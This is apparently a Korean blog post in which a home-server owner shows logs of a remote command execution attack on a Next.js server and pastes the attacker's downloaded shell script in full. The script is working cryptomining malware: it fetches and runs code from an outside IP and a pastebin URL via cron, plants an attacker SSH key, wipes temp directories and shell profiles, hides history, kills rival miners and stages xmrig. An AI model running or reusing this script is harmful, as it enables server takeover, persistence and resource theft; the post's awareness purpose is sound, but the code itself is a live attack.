728x90
홈서버에 이상한 로그가 쌓이길래 보았더니
아래와 같은 명령어가 계속 쌓였다.
: [Error: spawnSync /bin/sh ENOBUFS] { : -105, : 'ENOBUFS', : 'spawnSync /bin/sh', : '/bin/sh', : [ c', -q http://221.156.167.200:9090/js/grepb32.txt -O- |sh'
검색해보니 Remote Command Execution (RCE) attack 라고 하는데
해커의 서버에 있는 스크립트 다운받아서 실행하는 거란다.
저기에 있는 텍스트 파일을 접속해보니 아래와 같은 파일들이 있었다.
[전체 코드]
[Error: EROFS: read-only file system, open '/var/tmp/6h7hvj9t.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/6h7hvj9t.sh',
digest: '2109192527'
}
⨯ [Error: EROFS: read-only file system, open '/root/22kqkrpt'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/22kqkrpt',
digest: '4116131628'
}
⨯ [Error: EROFS: read-only file system, open '/root/l8zl7wxs'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/l8zl7wxs',
digest: '2944710764'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/8t5mxky6.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/8t5mxky6.sh',
digest: '2260870223'
}
⨯ [Error: EROFS: read-only file system, open '/root/88iimn8w'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/88iimn8w',
digest: '767570156'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/gapn1jj2.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/gapn1jj2.sh',
digest: '431724239'
}
⨯ [Error: EROFS: read-only file system, open '/root/53y3on8u'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/53y3on8u',
digest: '1419670508'
}
⨯ [Error: EROFS: read-only file system, open '/root/au52nov7'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/au52nov7',
digest: '2765509932'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/au7hqf5f.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/au7hqf5f.sh',
digest: '2021416143'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/47x8j3eh.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/47x8j3eh.sh',
digest: '2517699087'
}
⨯ [Error: EROFS: read-only file system, open '/root/1xj4ekku'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/1xj4ekku',
digest: '1013930604'
}
⨯ [Error: EROFS: read-only file system, open '/root/tl5qowmu'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/tl5qowmu',
digest: '3454751980'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/h4g61pzw.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/h4g61pzw.sh',
digest: '2688838863'
}
⨯ [Error: EROFS: read-only file system, open '/root/7rgoezr0'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/7rgoezr0',
digest: '3175021420'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/8ziwuikb.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/8ziwuikb.sh',
digest: '837302799'
}
⨯ [Error: EROFS: read-only file system, open '/root/uf7wkl4h'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/uf7wkl4h',
digest: '4176701036'
}
⨯ [Error: EROFS: read-only file system, open '/root/qsz3n8e9'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/qsz3n8e9',
digest: '2141452716'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/20rx0rhe.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/20rx0rhe.sh',
digest: '925503695'
}
⨯ [Error: EROFS: read-only file system, open '/root/bcjb9ur4'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/bcjb9ur4',
digest: '1738845292'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/gozruvlc.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/gozruvlc.sh',
digest: '1755801167'
}
⨯ [Error: EROFS: read-only file system, open '/root/f354hj5n'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/f354hj5n',
digest: '1570082732'
}
⨯ [Error: EROFS: read-only file system, open '/root/sizqus5k'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/sizqus5k',
digest: '2721348588'
}
npm notice
npm notice New major version of npm available! 10.9.4 -> 11.13.0
npm notice Changelog: https://github.com/npm/cli/releases/tag/v11.13.0
npm notice To update run: npm install -g npm@11.13.0
npm notice
> --yjw7003-next@0.1.0 start
> next start -p 3000
▲ Next.js 15.3.2
- Local: http://localhost:3000
- Network: http://172.19.0.5:3000
✓ Starting...
✓ Ready in 161ms
⨯ [Error: EROFS: read-only file system, open '/var/tmp/4xevfe5x.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/4xevfe5x.sh',
digest: '2054842831'
}
⨯ [Error: EROFS: read-only file system, open '/root/kst96ws7'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/kst96ws7',
digest: '338522604'
}
⨯ [Error: x] {
digest: 'TWVtOiAyOTU3MzA0SyB1c2VkLCA1MDY3OTQ4SyBmcmVlLCA3MjRLIHNocmQsIDgxNDY4SyBidWZmLCAxNTkwMTY0SyBjYWNoZWQKQ1BVOiAgIDAlIHVzciAgIDAlIHN5cyAgIDAlIG5pYyAxMDAlIGlkbGUgICAwJSBpbyAgIDAlIGlycSAgIDAlIHNpcnEKTG9hZCBhdmVyYWdlOiAwLjU5IDAuNDIgMC43OCAxLzM5NSAzMQogIFBJRCAgUFBJRCBVU0VSICAgICBTVEFUICAgVlNaICVWU1ogQ1BVICVDUFUgQ09NTUFORAogICAxOCAgICAgMSByb290ICAgICBTICAgIDEwLjRnIDEzNiUgICA2ICAgMCUgbmV4dC1zZXJ2ZXIgKHYxNS4zLjIpCiAgICAxICAgICAwIHJvb3QgICAgIFMgICAgIDQ1NW0gICA2JSAgIDAgICAwJSBucG0gc3RhcnQKICAgMjkgICAgMTggcm9vdCAgICAgUyAgICAgMTY5MiAgIDAlICAgNyAgIDAlIC9iaW4vc2ggLWMgdG9wIC1iIC1uIDF8aGVhZCAtbiAxNQogICAzMCAgICAyOSByb290ICAgICBSICAgICAxNjg4ICAgMCUgICAwICAgMCUgdG9wIC1iIC1uIDEKICAgMzEgICAgMjkgcm9vdCAgICAgUyAgICAgMTY3MiAgIDAlICAgMSAgIDAlIGhlYWQgLW4gMTUKCg=='
}
⨯ [Error: Command failed: pkill -f sh ] {
status: 1,
signal: null,
output: [Array],
pid: 32,
stdout: <Buffer >,
stderr: <Buffer >,
digest: '1571803207'
}
kill: can't kill pid 39: No such process
⨯ [Error: Command failed: echo cHMgYXV4IHwgZ3JlcCAtdiAnZ3JlcFx8c2VydmVyLmpzXHwvdG1wLy5YSU4tdW5peC9qYXZhZVx8bmV4dC1zZXJ2ZXJcfGVudHJ5cG9pbnQuc2hcfG5wbVx8c3RhcnQuc2hcfG5vZGVcfGJ1blx8c3RhcnR1cC5zaFx8TWFpblRocmVhZFx8TWVtXHxDUFVcfExvYWRcfFxbXHxwcyBhdXhcfFBJRCcgfCBhd2sgJ3twcmludCAkMX0nIHwgeGFyZ3MgLUkgJSBraWxsIC05ICUK |base64 -d |sh
kill: can't kill pid 39: No such process
] {
status: null,
signal: 'SIGKILL',
output: [Array],
pid: 33,
stdout: <Buffer >,
stderr: <Buffer 6b 69 6c 6c 3a 20 63 61 6e 27 74 20 6b 69 6c 6c 20 70 69 64 20 33 39 3a 20 4e 6f 20 73 75 63 68 20 70 72 6f 63 65 73 73 0a>,
digest: '2320609031'
}
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
rm: '/tmp/node-compile-cache' is a directory
chmod: /var/tmp/.bin: No such file or directory
touch: /var/tmp/.bin: Read-only file system
mkdir: can't create directory '/dev/shm/duet/app': No such file or directory
mkdir: can't create directory '/home/opc/.acme.sh': No such file or directory
sh: can't create /root/.bashrc: Read-only file system
sh: can't create /root/.bash_profile: Read-only file system
chmod: /root/.bash_history: No such file or directory
chattr: can't stat '/root/.bash_history': No such file or directory
sh: can't create /root/.profile: Read-only file system
mkdir: can't create directory '/root/.ssh': Read-only file system
sh: can't create /root/.ssh/authorized_keys: nonexistent directory
chmod: /root/.ssh/authorized_keys: No such file or directory
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
crontab: can't append to /var/spool/cron/crontabs/cron.update
crontab: can't create /var/spool/cron/crontabs/root.new
crontab: can't append to /var/spool/cron/crontabs/cron.update
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
ls: /proc/188: No such file or directory
ls: /proc/189: No such file or directory
ls: /proc/190: No such file or directory
ls: /proc/36/cwd: cannot read link: No such file or directory
ls: /proc/36/exe: cannot read link: No such file or directory
ls: /proc/36/root: cannot read link: No such file or directory
ls: /proc/40/cwd: cannot read link: No such file or directory
ls: /proc/40/exe: cannot read link: No such file or directory
ls: /proc/40/root: cannot read link: No such file or directory
ls: /proc/44/cwd: cannot read link: No such file or directory
ls: /proc/44/exe: cannot read link: No such file or directory
ls: /proc/44/root: cannot read link: No such file or directory
kill: invalid number 'USER'
chmod: /tmp/.ICEi-unix/*: No such file or directory
⨯ [Error: x] { digest: 'Q3JvbiBub3QgZm91bmQK' }
⨯ [Error: EROFS: read-only file system, open '/var/tmp/v0bcmu97.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/v0bcmu97.sh',
digest: '657542991'
}
⨯ [Error: EROFS: read-only file system, open '/root/a5kqz8xu'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/a5kqz8xu',
digest: '116764716'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/d5v3tfrg.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/d5v3tfrg.sh',
digest: '1038998991'
}
⨯ [Error: EROFS: read-only file system, open '/root/ye96kgum'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/ye96kgum',
digest: '1423107756'
}
⨯ [Error: x] {
digest: 'TWVtOiAyODg4OTYwSyB1c2VkLCA1MTM2MjkySyBmcmVlLCA3NTkySyBzaHJkLCA4MTU0MEsgYnVmZiwgMTU5NzA0MEsgY2FjaGVkCkNQVTogICAwJSB1c3IgICAwJSBzeXMgICAwJSBuaWMgMTAwJSBpZGxlICAgMCUgaW8gICAwJSBpcnEgICAwJSBzaXJxCkxvYWQgYXZlcmFnZTogMC4yOCAwLjMzIDAuNDQgMi80MDAgMjY3NQogIFBJRCAgUFBJRCBVU0VSICAgICBTVEFUICAgVlNaICVWU1ogQ1BVICVDUFUgQ09NTUFORAogICAxOCAgICAgMSByb290ICAgICBTICAgIDEwLjRnIDEzNiUgICA1ICAgMCUgbmV4dC1zZXJ2ZXIgKHYxNS4zLjIpCiAgICAxICAgICAwIHJvb3QgICAgIFMgICAgIDQ1NW0gICA2JSAgIDEgICAwJSBucG0gc3RhcnQKICAyNjggICAgIDEgcm9vdCAgICAgUyAgICAgMTcwNCAgIDAlICAgMCAgIDAlIHNoIEpjcXN0awogMjY3MyAgICAxOCByb290ICAgICBTICAgICAxNjkyICAgMCUgICA2ICAgMCUgL2Jpbi9zaCAtYyB0b3AgLWIgLW4gMXxoZWFkIC1uIDE1CiAyNjc0ICAyNjczIHJvb3QgICAgIFIgICAgIDE2ODggICAwJSAgIDcgICAwJSB0b3AgLWIgLW4gMQogMjY3NSAgMjY3MyByb290ICAgICBTICAgICAxNjcyICAgMCUgICAwICAgMCUgaGVhZCAtbiAxNQogMjY3MiAgIDI2OCByb290ICAgICBTICAgICAxNjcyICAgMCUgICAxICAgMCUgc2xlZXAgMTAKICAgNDAgICAgIDEgcm9vdCAgICAgWiAgICAgICAgMCAgIDAlICAgMCAgIDAlIFt4YXJnc10KICAgMzYgICAgIDEgcm9vdCAgICAgWiAgICAgICAgMCAgIDAlICAgMiAgIDAlIFtzaF0KICAgNDQgICAgIDEgcm9vdCAgICAgWiAgICAgICAgMCAgIDAlICAgNiAgIDAlIFtraWxsXQoK'
}
⨯ [Error: x] { digest: '1187598262' }
kill: can't kill pid 2683: No such process
⨯ [Error: Command failed: echo cHMgYXV4IHwgZ3JlcCAtdiAnZ3JlcFx8c2VydmVyLmpzXHwvdG1wLy5YSU4tdW5peC9qYXZhZVx8bmV4dC1zZXJ2ZXJcfGVudHJ5cG9pbnQuc2hcfG5wbVx8c3RhcnQuc2hcfG5vZGVcfGJ1blx8c3RhcnR1cC5zaFx8TWFpblRocmVhZFx8TWVtXHxDUFVcfExvYWRcfFxbXHxwcyBhdXhcfFBJRCcgfCBhd2sgJ3twcmludCAkMX0nIHwgeGFyZ3MgLUkgJSBraWxsIC05ICUK |base64 -d |sh
kill: can't kill pid 2683: No such process
] {
status: null,
signal: 'SIGKILL',
output: [Array],
pid: 2677,
stdout: <Buffer >,
stderr: <Buffer 6b 69 6c 6c 3a 20 63 61 6e 27 74 20 6b 69 6c 6c 20 70 69 64 20 32 36 38 33 3a 20 4e 6f 20 73 75 63 68 20 70 72 6f 63 65 73 73 0a>,
digest: '1430520487'
}
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
rm: '/tmp/.ICEi-unix' is a directory
chmod: /var/tmp/.bin: No such file or directory
touch: /var/tmp/.bin: Read-only file system
mkdir: can't create directory '/dev/shm/duet/app': No such file or directory
mkdir: can't create directory '/home/opc/.acme.sh': No such file or directory
sh: can't create /root/.bashrc: Read-only file system
sh: can't create /root/.bash_profile: Read-only file system
chmod: /root/.bash_history: No such file or directory
chattr: can't stat '/root/.bash_history': No such file or directory
sh: can't create /root/.profile: Read-only file system
mkdir: can't create directory '/root/.ssh': Read-only file system
sh: can't create /root/.ssh/authorized_keys: nonexistent directory
chmod: /root/.ssh/authorized_keys: No such file or directory
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
crontab: can't append to /var/spool/cron/crontabs/cron.update
crontab: can't create /var/spool/cron/crontabs/root.new
crontab: can't append to /var/spool/cron/crontabs/cron.update
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
ls: /proc/2672/cwd: cannot read link: No such file or directory
ls: /proc/2672/exe: cannot read link: No such file or directory
ls: /proc/2672/root: cannot read link: No such file or directory
ls: /proc/268/cwd: cannot read link: No such file or directory
ls: /proc/268/exe: cannot read link: No such file or directory
ls: /proc/268/root: cannot read link: No such file or directory
ls: /proc/2680/cwd: cannot read link: No such file or directory
ls: /proc/2680/exe: cannot read link: No such file or directory
ls: /proc/2680/root: cannot read link: No such file or directory
ls: /proc/2684/cwd: cannot read link: No such file or directory
ls: /proc/2684/exe: cannot read link: No such file or directory
ls: /proc/2684/root: cannot read link: No such file or directory
ls: /proc/2689/cwd: cannot read link: No such file or directory
ls: /proc/2689/exe: cannot read link: No such file or directory
ls: /proc/2689/root: cannot read link: No such file or directory
ls: /proc/2833: No such file or directory
ls: /proc/2834: No such file or directory
ls: /proc/2835: No such file or directory
ls: /proc/36/cwd: cannot read link: No such file or directory
ls: /proc/36/exe: cannot read link: No such file or directory
ls: /proc/36/root: cannot read link: No such file or directory
ls: /proc/40/cwd: cannot read link: No such file or directory
ls: /proc/40/exe: cannot read link: No such file or directory
ls: /proc/40/root: cannot read link: No such file or directory
ls: /proc/44/cwd: cannot read link: No such file or directory
ls: /proc/44/exe: cannot read link: No such file or directory
ls: /proc/44/root: cannot read link: No such file or directory
kill: invalid number 'USER'
chmod: /tmp/.ICEi-unix/*: No such file or directory
⨯ [Error: x] { digest: 'Q3JvbiBub3QgZm91bmQK' }
wget: can't open '/var/tmp/grep.tar.gz': Read-only file system
tar: can't open '/var/tmp/grep.tar.gz': No such file or directory
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
mv: can't rename '/var/tmp/xmrig-6.24.0': Read-only file system
mv: can't rename '/var/tmp/.unix/xmrig': No such file or directory
sh: can't create /var/tmp/.unix/config.json: nonexistent directory
⨯ [Error: x] { digest: '3257531580' }
⨯ [Error: EROFS: read-only file system, open '/root/7lirqkrw'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/7lirqkrw',
digest: '2556510316'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/zfe44dqr.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/zfe44dqr.sh',
digest: '4065597647'
}
⨯ [Error: EROFS: read-only file system, open '/root/jihlwjg3'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/jihlwjg3',
digest: '1048746220'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/gg6umj7q.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/gg6umj7q.sh',
digest: '4171355727'
}
⨯ [Error: x] {
digest: 'TWVtOiA1MDc1NDU2SyB1c2VkLCAyOTQ5Nzk2SyBmcmVlLCA3NTkySyBzaHJkLCA4MTYzNksgYnVmZiwgMzcxNjg2OEsgY2FjaGVkCkNQVTogICAwJSB1c3IgICAwJSBzeXMgICAwJSBuaWMgMTAwJSBpZGxlICAgMCUgaW8gICAwJSBpcnEgICAwJSBzaXJxCkxvYWQgYXZlcmFnZTogMC44OCAwLjY3IDAuNDggMS80MDkgNTczNgogIFBJRCAgUFBJRCBVU0VSICAgICBTVEFUICAgVlNaICVWU1ogQ1BVICVDUFUgQ09NTUFORAogICAxOCAgICAgMSByb290ICAgICBTICAgIDEwLjRnIDEzNiUgICA3ICAgMCUgbmV4dC1zZXJ2ZXIgKHYxNS4zLjIpCiAgICAxICAgICAwIHJvb3QgICAgIFMgICAgIDQ1NW0gICA2JSAgIDEgICAwJSBucG0gc3RhcnQKIDI5NDMgICAgIDEgcm9vdCAgICAgUyAgICAgMTcwNCAgIDAlICAgNCAgIDAlIHNoIEVKeUdZMAogNTczNCAgICAxOCByb290ICAgICBTICAgICAxNjkyICAgMCUgICAwICAgMCUgL2Jpbi9zaCAtYyB0b3AgLWIgLW4gMXxoZWFkIC1uIDE1CiA1NzM1ICA1NzM0IHJvb3QgICAgIFIgICAgIDE2ODggICAwJSAgIDIgICAwJSB0b3AgLWIgLW4gMQogNTczNiAgNTczNCByb290ICAgICBTICAgICAxNjcyICAgMCUgICAzICAgMCUgaGVhZCAtbiAxNQogNTczMyAgMjk0MyByb290ICAgICBTICAgICAxNjcyICAgMCUgICAxICAgMCUgc2xlZXAgMTAKICAyNjggICAgIDEgcm9vdCAgICAgWiAgICAgICAgMCAgIDAlICAgMCAgIDAlIFtzaF0KIDM0MDEgICAgIDEgcm9vdCAgICAgWiAgICAgICAgMCAgIDAlICAgNyAgIDAlIFtzc2xfY2xpZW50XQogMzM5MSAgICAgMSByb290ICAgICBaICAgICAgICAwICAgMCUgICA3ICAgMCUgW3NzbF9jbGllbnRdCiAzNDAyICAgICAxIHJvb3QgICAgIFogICAgICAgIDAgICAwJSAgIDYgICAwJSBbc3NsX2NsaWVudF0K'
}
⨯ [Error: x] { digest: '1187598262' }
kill: can't kill pid 5744: No such process
⨯ [Error: Command failed: echo cHMgYXV4IHwgZ3JlcCAtdiAnZ3JlcFx8c2VydmVyLmpzXHwvdG1wLy5YSU4tdW5peC9qYXZhZVx8bmV4dC1zZXJ2ZXJcfGVudHJ5cG9pbnQuc2hcfG5wbVx8c3RhcnQuc2hcfG5vZGVcfGJ1blx8c3RhcnR1cC5zaFx8TWFpblRocmVhZFx8TWVtXHxDUFVcfExvYWRcfFxbXHxwcyBhdXhcfFBJRCcgfCBhd2sgJ3twcmludCAkMX0nIHwgeGFyZ3MgLUkgJSBraWxsIC05ICUK |base64 -d |sh
kill: can't kill pid 5744: No such process
] {
status: null,
signal: 'SIGKILL',
output: [Array],
pid: 5738,
stdout: <Buffer >,
stderr: <Buffer 6b 69 6c 6c 3a 20 63 61 6e 27 74 20 6b 69 6c 6c 20 70 69 64 20 35 37 34 34 3a 20 4e 6f 20 73 75 63 68 20 70 72 6f 63 65 73 73 0a>,
digest: '1186201223'
}
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
rm: '/tmp/.ICEi-unix' is a directory
chmod: /var/tmp/.bin: No such file or directory
touch: /var/tmp/.bin: Read-only file system
mkdir: can't create directory '/dev/shm/duet/app': No such file or directory
mkdir: can't create directory '/home/opc/.acme.sh': No such file or directory
sh: can't create /root/.bashrc: Read-only file system
sh: can't create /root/.bash_profile: Read-only file system
chmod: /root/.bash_history: No such file or directory
chattr: can't stat '/root/.bash_history': No such file or directory
sh: can't create /root/.profile: Read-only file system
mkdir: can't create directory '/root/.ssh': Read-only file system
sh: can't create /root/.ssh/authorized_keys: nonexistent directory
chmod: /root/.ssh/authorized_keys: No such file or directory
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
crontab: can't append to /var/spool/cron/crontabs/cron.update
crontab: can't create /var/spool/cron/crontabs/root.new
crontab: can't append to /var/spool/cron/crontabs/cron.update
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
ls: /proc/2672/cwd: cannot read link: No such file or directory
ls: /proc/2672/exe: cannot read link: No such file or directory
ls: /proc/2672/root: cannot read link: No such file or directory
ls: /proc/268/cwd: cannot read link: No such file or directory
ls: /proc/268/exe: cannot read link: No such file or directory
ls: /proc/268/root: cannot read link: No such file or directory
ls: /proc/2680/cwd: cannot read link: No such file or directory
ls: /proc/2680/exe: cannot read link: No such file or directory
ls: /proc/2680/root: cannot read link: No such file or directory
ls: /proc/2684/cwd: cannot read link: No such file or directory
ls: /proc/2684/exe: cannot read link: No such file or directory
ls: /proc/2684/root: cannot read link: No such file or directory
ls: /proc/2689/cwd: cannot read link: No such file or directory
ls: /proc/2689/exe: cannot read link: No such file or directory
ls: /proc/2689/root: cannot read link: No such file or directory
ls: /proc/2943/cwd: cannot read link: No such file or directory
ls: /proc/2943/exe: cannot read link: No such file or directory
ls: /proc/2943/root: cannot read link: No such file or directory
ls: /proc/3391/cwd: cannot read link: No such file or directory
ls: /proc/3391/exe: cannot read link: No such file or directory
ls: /proc/3391/root: cannot read link: No such file or directory
ls: /proc/3401/cwd: cannot read link: No such file or directory
ls: /proc/3401/exe: cannot read link: No such file or directory
ls: /proc/3401/root: cannot read link: No such file or directory
ls: /proc/3402/cwd: cannot read link: No such file or directory
ls: /proc/3402/exe: cannot read link: No such file or directory
ls: /proc/3402/root: cannot read link: No such file or directory
ls: /proc/3410/cwd: cannot read link: No such file or directory
ls: /proc/3410/exe: cannot read link: No such file or directory
ls: /proc/3410/root: cannot read link: No such file or directory
ls: /proc/36/cwd: cannot read link: No such file or directory
ls: /proc/36/exe: cannot read link: No such file or directory
ls: /proc/36/root: cannot read link: No such file or directory
ls: /proc/40/cwd: cannot read link: No such file or directory
ls: /proc/40/exe: cannot read link: No such file or directory
ls: /proc/40/root: cannot read link: No such file or directory
ls: /proc/44/cwd: cannot read link: No such file or directory
ls: /proc/44/exe: cannot read link: No such file or directory
ls: /proc/44/root: cannot read link: No such file or directory
ls: /proc/5733/cwd: cannot read link: No such file or directory
ls: /proc/5733/exe: cannot read link: No such file or directory
ls: /proc/5733/root: cannot read link: No such file or directory
ls: /proc/5741/cwd: cannot read link: No such file or directory
ls: /proc/5741/exe: cannot read link: No such file or directory
ls: /proc/5741/root: cannot read link: No such file or directory
ls: /proc/5745/cwd: cannot read link: No such file or directory
ls: /proc/5745/exe: cannot read link: No such file or directory
ls: /proc/5745/root: cannot read link: No such file or directory
ls: /proc/5750/cwd: cannot read link: No such file or directory
ls: /proc/5750/exe: cannot read link: No such file or directory
ls: /proc/5750/root: cannot read link: No such file or directory
ls: /proc/5894: No such file or directory
ls: /proc/5895: No such file or directory
ls: /proc/5896: No such file or directory
kill: invalid number 'USER'
chmod: /tmp/.ICEi-unix/*: No such file or directory
⨯ [Error: x] { digest: 'Q3JvbiBub3QgZm91bmQK' }
⨯ [Error: EROFS: read-only file system, open '/root/1w1onm6y'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/1w1onm6y',
digest: '1554842604'
}
cat: can't open '/tmp/.XIN-unix/config.json': No such file or directory
⨯ [Error: Command failed: cat /tmp/.XIN-unix/config.json |grep user
cat: can't open '/tmp/.XIN-unix/config.json': No such file or directory
] {
status: 1,
signal: null,
output: [Array],
pid: 7635,
stdout: <Buffer >,
stderr: <Buffer 63 61 74 3a 20 63 61 6e 27 74 20 6f 70 65 6e 20 27 2f 74 6d 70 2f 2e 58 49 4e 2d 75 6e 69 78 2f 63 6f 6e 66 69 67 2e 6a 73 6f 6e 27 3a 20 4e 6f 20 73 ... 22 more bytes>,
digest: '3134927815'
}#!/bin/sh
rm -f /tmp/.*
rm -f /tmp/*
pkill -f http://185.216.75.152
rm -f /dev/shm/*
rm -rf /var/tmp/*
rm -rf xmrig-6.24.0
rm -rf /app/web/xmrig*
rm -f /app/web/.log
ps aux | grep -v grep | grep 'ldr.sh' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xmrig\|kworker_ds' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/app/web/guard.js' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi\|auto.c3pool' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sh -s kthreaddo' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'node /var/tmp/\|node /tmp/' | awk '{print $1}' | xargs -I % kill -9 %
rm -rf ~/moneroocean
pkill -9 -f mysqldd
pkill -9 -f monero
pkill -9 -f kinsing
pkill -9 -f sshpass
pkill -9 -f sshexec
pkill -9 -f attack
pkill -9 -f dovecat
pkill JavaUpdate
pkill SSHD2
pkill -f /var/tmp/.bin
chmod +w /var/tmp/.bin
touch /var/tmp/.bin
pkill mysqlserver
pkill gitlab-redis
pkill ksoftriqd
pkill -9 -f donate
pkill -9 -f xmr-stak
pkill -9 -f crond64
pkill -9 -f stratum
pkill -9 -f /tmp/java
pkill -9 -f pastebin
pkill -9 -f /tmp/system
pkill -9 -f excludefile
pkill -9 -f agettyd
pkill -9 -f /var/tmp
pkill -9 pnscan
rm -f /dev/shm/duet/app
mkdir /dev/shm/duet/app
rm -rf /home/opc/.acme.sh
mkdir /home/opc/.acme.sh
pkill -9 masscan
pkill -9 kthreaddi
pkill -9 sysguard
pkill -9 kthreaddk
pkill -9 kdevtmpfsi
pkill -9 networkservice
pkill -9 sysupdate
pkill -9 phpguard
pkill -9 phpupdate
pkill -9 networkmanager
pkill -9 knthread
pkill -9 mysqlserver
pkill -9 watchbog
pkill -9 xmrig
pkill -9 -f /dev/shm
pkill -9 bashirc
echo >~/.bashrc
echo >~/.bash_profile
chmod -w ~/.bash_history
chattr +i ~/.bash_history
echo >~/.profile
mkdir ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcczUbb3KWRPOdPrZECTFvOnRmOYoq/EOcr34XcTBq2XkRAKa6W9XNuL+ewWp8uBLPLUtH9zpt54OQI1ebBDe+BOZYHRrfCshsQ75moWA/TjO5S7IalrBGeUpXPOYlyDyAfhjy/5dG0EGA+oO3Sui+38CDT4dnQ8TqVZZNFElrwYDHHtrzZOji7iMW0LuFDE/hkk2C5hLKD5BxmzCFZUi7BQXSgcCCwqTNe0V0QxnEbyjmePrgNVni6MOMqw+XmfDZamtmcr0MZUvlVDDnAMU59opdG4JP71S0IYozYBbXylBsHZ+s2bSdjZYTZbT0/oQZlpX2duAnYn9Ant3qLKQ9 beaj">>~/.ssh/authorized_keys
chmod -w ~/.ssh/authorized_keys
pgrep pbotbyjanhotzu | xargs -I % kill -9 %
netstat -antp | grep ':10032' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':33331' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':17777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill kinsing
pkill -9 zgrab
url="https://pastebin.com/raw/1E9cGF4W"
if crontab -l | grep -q "$url"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
echo "*/5 * * * * wget -q https://pastebin.com/raw/1E9cGF4W -O- |sh > /dev/null 2>&1" | crontab -
fi
ps -fe | grep javae | grep -v 'grep\|\['; if [ $? -ne 0 ]; then
rm -rf /tmp/.*
rm -rf /tmp/*
rm -rf /var/tmp/*
for i in $(ls /proc|grep '[0-9]'); do
if ls -al /proc/$i 2>/dev/null|grep javae 2>/dev/null; then
continue
fi
if grep -a 'donate-level' /proc/$i/exe 1>/dev/null 2>&1; then
kill -9 $i
fi
if ls -al /proc/$i | grep exe | grep "/var/tmp\|/tmp\|/dev/shm\|deleted"; then
kill -9 $i
fi
done
pkill -f /tmp/.ICEi-unix/javae
ps auxf|grep -v grep | awk '{if($3>=70.0) print $2}'| xargs kill -9
mkdir /tmp/.ICEi-unix
